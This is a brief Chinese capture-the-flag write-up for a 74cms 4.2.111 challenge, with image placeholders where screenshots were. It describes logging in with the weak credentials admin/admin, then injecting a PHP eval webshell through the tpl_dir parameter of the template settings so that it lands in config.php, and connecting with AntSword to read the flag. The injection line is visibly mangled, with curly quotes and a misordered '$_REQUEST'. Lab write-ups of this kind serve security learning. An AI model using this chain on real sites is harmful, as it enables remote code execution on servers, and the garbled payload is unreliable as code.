qsnctf 骑士CMS01 wp

题目提示弱口令
在这里插入图片描述
启动环境
qsnctf 骑士CMS01 wp_第1张图片
查看cms版本
在这里插入图片描述
百度一下骑士cms的后台路径
/index.php?m=admin&c=index&a=login
进入后台qsnctf 骑士CMS01 wp_第2张图片
弱口令爆破
账号admin
得到密码admin

进入后台
qsnctf 骑士CMS01 wp_第3张图片

依据74cms 4.2.111查询相关漏洞
依次点击工具
风格模板
可用模板(在此时抓包)

参考资料:https://blog.csdn.net/fly_hps/article/details/118151916
qsnctf 骑士CMS01 wp_第4张图片
修改tpl_dir参数的值
‘, ‘a’,eval(@_$REQUEST[‘114514’]),’ ”:
提交数据包
蚁剑连接/Application/Home/Conf/config.php路径
qsnctf 骑士CMS01 wp_第5张图片
在根目录下找到flag

你可能感兴趣的:(CTF-WEB,php,安全,开发语言,网络安全)